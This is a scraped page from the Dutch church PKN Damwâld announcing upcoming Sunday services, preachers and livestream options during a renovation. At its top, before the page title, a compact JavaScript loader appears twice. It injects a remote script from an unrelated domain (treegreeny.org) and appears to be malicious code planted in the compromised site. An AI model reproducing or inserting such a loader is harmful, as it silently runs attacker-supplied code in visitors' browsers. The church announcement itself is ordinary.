;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Onze diensten komende zondag ! - PKN Damwâld

Onze diensten komende zondag !

Gepubliceerd op: dinsdag 23 augustus 2022

Vanwege de verbouwing van De Ontmoeting zullen tot in ieder geval 9 oktober alle diensten in de Bonifatiuskerk worden gehouden. Komende zondagmorgen hoopt om 09.30 uur onze kerkelijk werker Robert Colijn voor te gaan. ’s Avonds om 19.30 uur is – ook in de Bonifatiuskerk – onze laatste zomeravonddienst van dit jaar, met als voorganger ds. G. J. Otter.

Voor de kerkgangers is het raadzaam liedboek en Bijbel mee te nemen, want er is geen beamervoorziening in de Bonifatiuskerk. Verder is het tip om vanwege de verwachte opkomst en de verwachte weersomstandigheden luchtige kleding te dragen en genoeg drinken mee te nemen. U kunt de dienst uiteraard ook volgen en terugzien via de livestream via deze website. Ook kunt u via kanaal 1955 van Kabelnoord de dienst live meeluisteren.

De geplande middagdienst op 11 september 2022 is  vanwege allerlei redenen komen te vervallen. Op 25 september is er zoals gebruikelijk weer een middagdienst om 14.00 uur in de Bonifatiuskerk. Voorganger hoopt dan te zijn onze eigen ds. G.J. Otter.